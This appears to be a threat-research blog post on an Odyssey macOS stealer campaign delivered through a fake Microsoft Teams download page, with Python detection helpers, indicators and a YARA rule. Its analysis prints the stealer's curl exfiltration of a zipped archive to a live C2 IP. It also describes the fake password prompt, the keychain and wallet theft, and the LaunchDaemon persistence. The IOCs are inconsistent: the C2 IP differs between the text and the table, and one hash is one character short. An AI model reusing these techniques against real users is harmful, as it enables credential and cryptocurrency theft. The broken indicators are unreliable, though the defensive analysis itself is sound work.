
Executive Summary

In early August 2025, Forcepoint released a report about a clickfix campaign that impersonated Tradingview to deliver Odyssey stealer. During routine infrastructure discovery, CloudSEK’s TRIAD identified that the threat actors are now luring users via a fake Microsoft Teams download site. When victims copy the provided command, a base64-encoded AppleScript stealer (Odyssey) is executed. The malware harvests credentials, browser cookies, Apple Notes, and multiple desktop/extension-based cryptocurrency wallets, staging data into /tmp/out.zip before exfiltrating it to its C2. It then establishes persistence via LaunchDaemons and replaces Ledger Live with a trojanized version.

Analysis 

During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix themed delivery websites targeting macOS users. One of those websites was found to be impersonating Microsoft, with a “Microsoft Teams” logo on the delivery page. Hunting using FOFA, we found 24 unique IPs belonging to the same cluster.

Landing page - teamsonsoft[.]com

When the victim clicks “Copy”, a command is placed on the clipboard, chosen by user agent. For Windows it copies the command shown on the page. For macOS users it copies the following:

Clipboard - macOS useragent

The base64 encoded text, decoded below:

Contents of delivery script
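To make the decode step above repeatable, here is an added triage helper (example code written for this edit, not CloudSEK's tooling and not the attacker's script). It assumes the clipboard text has the shape `echo <base64> | base64 -d | bash`, which the report does not state, and the script it decodes is a constructed stand-in that only reuses the command fragments the analysis lists; the C2 host, AppleScript body and working paths in it are placeholders.

```python
import base64
import re
import shlex

# Command fragments the analysis lists for the decoded Odyssey delivery script.
ODYSSEY_MARKERS = (
    "osascript -e 'run script",
    "dscl . authonly",
    'find-generic-password -ga "Chrome"',
    "masterpass-chrome",
    "ditto -c -k",
    "/tmp/out.zip",
    "/Library/LaunchDaemons/",
    "launchctl bootstrap system",
)

# A bare token of 40+ base64 characters with optional '=' padding.
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def extract_base64_blobs(one_liner: str) -> list:
    """Return the base64-looking tokens in a pasted one-liner.

    Assumption (not stated in the report): the clipboard text looks like
    `echo <base64> | base64 -d | bash`, so the payload is one long bare token.
    """
    try:
        tokens = shlex.split(one_liner)
    except ValueError:            # unbalanced quotes: fall back to whitespace split
        tokens = one_liner.split()
    return [t for t in tokens if B64_TOKEN.match(t)]


def decode_payload(blob: str) -> str:
    """Decode one base64 blob to text, restoring any stripped '=' padding."""
    padded = blob + "=" * (-len(blob) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")


def triage(one_liner: str) -> dict:
    """Decode every embedded blob and report which Odyssey markers appear."""
    decoded = "\n".join(decode_payload(b) for b in extract_base64_blobs(one_liner))
    hits = [m for m in ODYSSEY_MARKERS if m in decoded]
    verdict = "odyssey-like" if len(hits) >= 3 else "no match"
    return {"decoded": decoded, "hits": hits, "verdict": verdict}


# Constructed stand-in for the decoded script: only the command fragments the
# analysis names, with the AppleScript body and the C2 replaced by placeholders.
CONSTRUCTED_SCRIPT = "\n".join([
    "#!/bin/bash",
    "osascript -e 'run script \"<AppleScript body elided>\"'",
    'dscl . authonly "$USER" "$pw"',
    'security find-generic-password -ga "Chrome" > masterpass-chrome',
    "ditto -c -k /tmp/work /tmp/out.zip",
    "curl -X POST --data-binary @/tmp/out.zip http://C2-PLACEHOLDER/log",
])
CONSTRUCTED_CLIPBOARD = (
    "echo " + base64.b64encode(CONSTRUCTED_SCRIPT.encode()).decode() + " | base64 -d | bash"
)

if __name__ == "__main__":
    result = triage(CONSTRUCTED_CLIPBOARD)
    print(result["verdict"], result["hits"])
```

Paste a real clipboard capture into triage() instead of CONSTRUCTED_CLIPBOARD; the decoded text is returned as well so the full script can be handed to the YARA rule at the end of this post.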

1) Execution

  • One-liner launches a large embedded AppleScript with osascript -e 'run script ...'. No exploit, just script execution. (T1059.002) 

2) Discovery

  • Gathers system inventory with system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType; stores it as “hardware” in a temp working dir /tmp/<random>/. (T1082) 

3) Credential Access, Privilege Escalation

  • Checks whether it can authenticate the local user with dscl . authonly. If not, it prompts the user with a fake dialog: “Required Application Helper. Please enter device password to continue.” The prompt loops until a password that passes dscl . authonly is entered. (T1056.002, T1110) 
  • Tries to pull the Chrome keychain item via security ... find-generic-password -ga "Chrome" and writes a “masterpass-chrome” file. (T1555.001) 
  • Stashes the captured password at ~/.pwd. (T1555, T1078) 

4) Collection

Apple ecosystem

  • Apple Notes database (NoteStore.sqlite, -wal, -shm) + a fallback that talks to the Notes app to export note bodies into HTML; also vacuums Notes attachments from Notes “Media” folders. (T1119, T1113) 
  • Safari artifacts: Cookies.binarycookies, “Form Values”. (T1555.003, T1539) 
  • Login keychain copy: ~/Library/Keychains/<HardwareUUID> and login.keychain-db. (T1555.001) 

Browsers (Chromium family: Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Chromium, etc.)

  • Walks every profile directory (Default and Profile *) and copies:
    • Cookies, Web Data, Login Data (saved logins & autofill). (T1555.003)
    • Local Extension Settings/ and IndexedDB/ for a very long allowlist of extension IDs (wallets, password managers, etc.). (T1005) 

Browsers (Gecko family: Firefox, Waterfox)

  • Copies cookies.sqlite, formhistory.sqlite, key4.db, logins.json from each profile. (T1555.003)
  • Specifically hunts MetaMask storage by parsing prefs.js to derive the extension’s storage path, then copies its idb buckets. (T1005) 

Crypto wallets (desktop apps)

  • Recursively copies data for Electrum, Coinomi, Exodus, Atomic, Wasabi, Monero, Bitcoin Core, Litecoin Core, Dash Core, Electron Cash, Guarda, Dogecoin Core, Trezor Suite, plus Ledger Live. (T1555, T1005) 
  • Also grabs Binance/TonKeeper config paths. 

Grab-bag

  • From Desktop/Documents, quietly copies up to ~10 MB of files with “interesting” extensions: txt,pdf,doc,docx,keys,key,wallet,kdbx,jpg,png,jpeg,rtf. (T1005) 

5) Exfil Preparation

  • Mirrors directory trees but skips noisy caches (GPUCache, Code Cache, Crashpad, Cache, etc.). (T1074)
  • Archives everything to /tmp/out.zip via ditto -c -k. (T1560) 

6) Exfiltration, C2

  • curl -X POST ... --data-binary @/tmp/out.zip http://185.93.89[.]62/log with the custom headers buildid, username: vipx and repeat: false. Retries on failure. (T1041) 
  • Same host serves secondary payloads at /otherassets/plist and /otherassets/ledger.zip. (T1105) 
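As an added example (not part of the original analysis), the parser below applies the traits of that upload, a raw zip body, the buildid/username/repeat headers and a curl user-agent, to a raw HTTP request, which is how the same logic would be expressed in a proxy or NIDS rule. The request it inspects is constructed: the host is a TEST-NET address standing in for the C2, the buildid value is a placeholder, and the body is a truncated zip header rather than a real archive.

```python
ZIP_MAGIC = b"PK\x03\x04"
# Non-standard request headers the analysis observed on the upload to /log.
ODYSSEY_HEADERS = {"buildid", "username", "repeat"}


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def score_request(raw: bytes) -> dict:
    """Return the reasons a request resembles the Odyssey /log upload."""
    method, path, headers, body = parse_http_request(raw)
    reasons = []
    if method == "POST" and body.startswith(ZIP_MAGIC):
        reasons.append("zip archive posted as raw body")
    if ODYSSEY_HEADERS <= set(headers):
        reasons.append("buildid/username/repeat headers present")
    if headers.get("username") == "vipx":
        reasons.append("username header 'vipx'")
    if headers.get("user-agent", "").startswith("curl/") and reasons:
        reasons.append("curl user-agent")
    # Two independent traits are required so a lone curl upload is not flagged.
    return {"path": path, "reasons": reasons, "suspicious": len(reasons) >= 2}


# Constructed request with the shape of the observed upload. 203.0.113.10 is
# a TEST-NET placeholder for the C2; the buildid value is invented; curl sends
# application/x-www-form-urlencoded by default for --data-binary.
CONSTRUCTED_UPLOAD = (
    b"POST /log HTTP/1.1\r\n"
    b"Host: 203.0.113.10\r\n"
    b"User-Agent: curl/8.7.1\r\n"
    b"buildid: 1\r\n"
    b"username: vipx\r\n"
    b"repeat: false\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 22\r\n"
    b"\r\n"
    b"PK\x03\x04" + b"\x00" * 18
)
# Constructed ordinary form POST for comparison.
CONSTRUCTED_BENIGN = (
    b"POST /api/upload HTTP/1.1\r\nHost: 203.0.113.20\r\nUser-Agent: Mozilla/5.0\r\n"
    b"Content-Length: 5\r\n\r\nhello"
)

if __name__ == "__main__":
    for req in (CONSTRUCTED_UPLOAD, CONSTRUCTED_BENIGN):
        print(score_request(req))
```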

7) Persistence, Defense Evasion, C2

  • LaunchDaemon persistence: downloads a shell command string, wraps it in a random-named com.<random>.plist, installs to /Library/LaunchDaemons/, launchctl bootstrap system ...; falls back to nohup run if bootstrap fails. Requires sudo, hence the password prompt earlier. (T1543.004, T1053.003) 
  • App replacement: kills and replaces Ledger Live.app with a ZIP fetched from the C2, using sudo to remove the original and unzip the trojanized copy into /Applications. (T1036, T1105) 
  • Cleans up the working dir and /tmp/out.zip after upload. (T1070.004) 

This Odyssey sample runs via osascript, steals keychains, cookies, saved logins, Apple Notes, and dozens of wallet/extension stores, zips everything, ships it to http://185.93.89[.]62/log, then plants persistence (LaunchDaemon) and even replaces Ledger Live with a trojanized copy. The C2 is also hosting the Odyssey stealer login panel.

Indicators of Compromise

IOC Indicator Table

Type                 Indicator
IP / C2              185.93.89[.]162 (HTTP, /log, /otherassets/plist, /otherassets/ledger.zip)
Delivery (Clickfix)  teamsonsoft[.]com
Hashes (SHA-256)     9c520fa25239c0f116ce7818949ddce5fd2f315317863715416cb4886c5aeb2
                     7a8250904e6f079e1a952b87e55dc87e467cc560a2694a142f2d6547ac40d5e1
                     d81cc9380673cb36a30f2a84ef155b0cbc7958daa6870096e455044fba5f9ee8
                     397ee604eb5e20905605c9418838aadccbbbfe6a15fc9146442333cfc1516273
                     909038524250903a44efd734710e60a8f73719130176c726e58d3287b22067c8
File Artifacts       ~/.pwd, ~/.username, ~/.chost, ~/.botid
Persistence          /Library/LaunchDaemons/com.<random>.plist (random numeric suffix)
Process/Commands     osascript -e run script; dscl . authonly; security ... -ga "Chrome"; ditto -c -k; curl -X POST ... --data-binary @/tmp/out.zip; unzip /tmp/ledger.zip
App Tampering        Replacement of /Applications/Ledger Live.app with a trojanized version

Impact

  • Credential Theft: Browser logins, autofill data, keychains, and crypto wallet credentials stolen.
  • Data Exfiltration: Notes, documents, screenshots, and up to 10 MB of personal files exfiltrated.
  • Financial Theft: Direct compromise of crypto wallets (desktop + extension + Ledger Live tampering).
  • Persistence & Re-infection: System-level LaunchDaemon ensures long-term access and reinfection risk.

Mitigations

  • Network Controls: Monitor for unusual curl POSTs with zipped data.
  • Endpoint Hunting: Audit /Library/LaunchDaemons/ for suspicious com.<digits>.plist and recent osascript executions.
  • Credential Hygiene: Reset Apple ID, browser, and wallet passwords; reissue keys from uncompromised systems.
  • Containment & Recovery: Remove trojanized /Applications/Ledger Live.app, wipe temp artifacts, and rebuild infected macOS systems if integrity cannot be guaranteed.
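An added hunting script for the LaunchDaemon audit above (written for this edit, not CloudSEK tooling). It applies the two traits the persistence section describes, a com.<digits> label and a command chain built on osascript, curl or nohup, to every plist in a directory. The fixture directory, its labels and its commands are constructed test data; the "/tmp/" and "base64" fragments are extra heuristics of my own rather than something observed in the sample.

```python
import os
import plistlib
import re
import tempfile

# Label shape from the report: com.<random numeric suffix>
RANDOM_LABEL = re.compile(r"^com\.\d+$")
# Tools the sample's daemon command chain relies on per the analysis
# (osascript, curl, nohup); "/tmp/" and "base64" are added heuristics.
SUSPECT_FRAGMENTS = ("osascript", "curl", "nohup", "base64", "/tmp/")


def audit_launch_daemons(directory: str) -> list:
    """Return [(plist filename, [reasons])] for entries that deserve review."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(directory, name)
        try:
            with open(path, "rb") as fh:
                plist = plistlib.load(fh)
        except Exception as exc:        # unreadable plist: report it rather than skip it
            findings.append((name, [f"unparseable plist: {exc}"]))
            continue
        reasons = []
        label = str(plist.get("Label", ""))
        if RANDOM_LABEL.match(name[:-len(".plist")]) or RANDOM_LABEL.match(label):
            reasons.append("random numeric label")
        # Both Program (string) and ProgramArguments (array) can carry the command.
        parts = [str(plist.get("Program", ""))]
        parts += [str(a) for a in plist.get("ProgramArguments", [])]
        command = " ".join(parts)
        for fragment in SUSPECT_FRAGMENTS:
            if fragment in command:
                reasons.append(f"command references {fragment}")
        if reasons:
            findings.append((name, reasons))
    return findings


def build_fixture() -> str:
    """Write one benign and one Odyssey-style plist to a temp dir (constructed test data)."""
    directory = tempfile.mkdtemp()
    entries = {
        "com.example.updater.plist": {
            "Label": "com.example.updater",
            "ProgramArguments": ["/usr/local/bin/updater", "--check"],
        },
        "com.8675309.plist": {
            "Label": "com.8675309",
            "ProgramArguments": ["/bin/sh", "-c", "nohup osascript -e 'run script ...' &"],
        },
    }
    for filename, data in entries.items():
        with open(os.path.join(directory, filename), "wb") as fh:
            plistlib.dump(data, fh)
    return directory


if __name__ == "__main__":
    real = "/Library/LaunchDaemons"
    target = real if os.path.isdir(real) else build_fixture()
    for filename, reasons in audit_launch_daemons(target):
        print(filename, "->", "; ".join(reasons))
```

On a live Mac, run it as root so every plist in /Library/LaunchDaemons is readable; a hit on the label pattern alone is worth a look, since legitimate daemons are named after their vendor, not a bare number.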

Yara Rule

rule OSX_Odyssey_Osascript_Exec
{
    meta:
        description = "Detects Odyssey stealer AppleScript execution via osascript"
        date = "2025-09-04"
    strings:
        $osascript = "osascript -e 'run script" ascii
        $dscl_auth = "dscl . authonly" ascii
        $security_chrome = "security" ascii wide nocase
        $masterpass = "masterpass-chrome" ascii
    condition:
        all of them
}

The rule's strings are plaintext, so it matches the decoded delivery script (or a captured process command line), not the base64 blob that sits on the clipboard or the landing page HTML; run it against decoded payloads and osascript arguments.


Koushik Pal
Threat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover attacker motives, methods, and operations.
